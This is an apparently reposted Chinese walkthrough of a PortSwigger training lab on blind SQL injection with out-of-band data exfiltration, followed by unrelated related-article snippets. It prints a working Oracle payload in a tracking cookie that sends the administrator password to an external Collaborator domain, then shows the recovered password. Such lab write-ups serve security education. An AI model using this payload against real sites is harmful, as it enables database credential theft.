Lab17_ Blind SQL injection with out-of-band data exfiltration

news/2025/3/13 20:51:31/

文章目录

  • 前言:
  • 进入实验室
  • 构造 payload

前言:

实验室标题为:

带外数据泄露的 SQL 盲注

简介:

本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。

SQL查询是异步执行的,对应用程序的响应没有影响。但是,您可以触发与外部域的带外交互。

该数据库包含一个名为users的表,其中的列名为username和password。您需要利用SQL盲目注入漏洞来找出管理员用户的密码。

要解决实验,请以管理员用户身份登录。

注意

为了防止Academy平台被用于攻击第三方,我们的防火墙阻止了实验室与任意外部系统之间的交互。要解决实验,您必须使用Burp Collaborator的默认公共服务器。

提示

您可以在 SQL 注入小抄中找到一些有用的有效载荷

进入实验室

依然是商店页面

构造 payload

点击任意分类,打开 burp 进行抓包

复制 Collaborator 中的链接

sql">TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.c5inwpad5ruzenww7a6z0gt3dujm7cv1.oastify.com/"> %remote;]>'),'/l') FROM dual--

发送数据包,成功响应

转到 Collaborator 模块,点击 Poll now

可以看到管理员账户的密码被成功外带出来

登录管理员账号

administrator

q1uuvho3ov5renjtp936

成功登录管理员账户


http://www.ppmy.cn/news/1578882.html

相关文章

新一代开源数字供应链安全审查与治理平台:悬镜源鉴SCA

管理数字供应链中的开源风险 Managing Open Source Risks in Digital Supply Chain 悬镜源鉴SCA开源威胁管控平台作为新一代开源数字供应链安全审查与治理平台&#xff0c;深度融合悬镜原创专利级的代码疫苗技术&#xff0c;是国内集组件成分分析、代码成分溯源、制品成分二进…

今日头条文章爬虫教程

今日头条文章爬虫教程 随着互联网的发展&#xff0c;新闻资讯类平台如今日头条积累了海量的数据。对于数据分析师、研究人员等群体来说&#xff0c;获取这些数据进行分析和研究具有重要的价值。本文将介绍如何使用Python编写爬虫&#xff0c;爬取今日头条的文章数据。 一、准…

Java继承详解:核心特性与实战指南

在面向对象编程&#xff08;OOP&#xff09;中&#xff0c;​继承是实现代码复用和构建层次化类关系的核心机制。然而&#xff0c;Java的继承机制有其独特的设计规则。本文基于核心特性图示&#xff0c;深入解析Java继承的限制、实现方式及其底层逻辑&#xff0c;帮助开发者规避…

DeepSeek、Grok与ChatGPT:AI三巨头的技术博弈与场景革命

## 引言&#xff1a;AI工具的三国杀时代 2025年的AI江湖&#xff0c;DeepSeek以黑马之姿横扫全球应用榜单&#xff0c;Grok 3凭借马斯克的狂言抢占头条&#xff0c;ChatGPT则稳坐行业王座。这场技术竞赛不仅是参数量的比拼&#xff0c;更是一场关于效率、成本与场景适配的终极…

【测试框架篇】单元测试框架pytest(5):setup和teardown的详细使用

一、前言 用过unittest的童鞋们应用都知道&#xff0c;有两个前置方法&#xff0c;两个后置方法如下&#xff1a; setup()setupClass()teardown()teardownClass() Pytest也提供了类似于setup、teardown的方法&#xff0c;并且还超过四个&#xff0c;一共有十种分级别的方法&…

跨越时空的对话:图灵与GPT-4聊AI的前世今生

&#xff08;背景&#xff1a;虚拟咖啡厅&#xff0c;图灵身着1950年代西装&#xff0c;端着一杯热茶&#xff0c;GPT-4以全息投影形态坐在对面&#xff09; 图灵&#xff08;喝了口茶&#xff09;&#xff1a;“听说你能写诗&#xff1f;我当年在布莱切利园破解Enigma时&…

Ubuntu 22.04 无法进入图形界面的解决方法

Ubuntu 22.04 无法进入图形界面&#xff0c;只能进入 tty&#xff0c;可能是由于图形界面相关的配置或驱动程序出现了问题。以下是一些常见的解决方法&#xff1a; 1. 检查图形界面服务状态 首先&#xff0c;检查图形界面服务&#xff08;通常是 gdm 或 lightdm&#xff09;的…

Flutter 学习之旅 之 flutter 不使用插件,实现简单自定义弹窗PopupDialog功能

Flutter 学习之旅 之 flutter 不使用插件&#xff0c;实现简单自定义弹窗PopupDialog功能 目录 Flutter 学习之旅 之 flutter 不使用插件&#xff0c;实现简单自定义弹窗PopupDialog功能 一、简单介绍 二、PopupDialog 三、简单案例实现 四、关键代码 一、简单介绍 Flutt…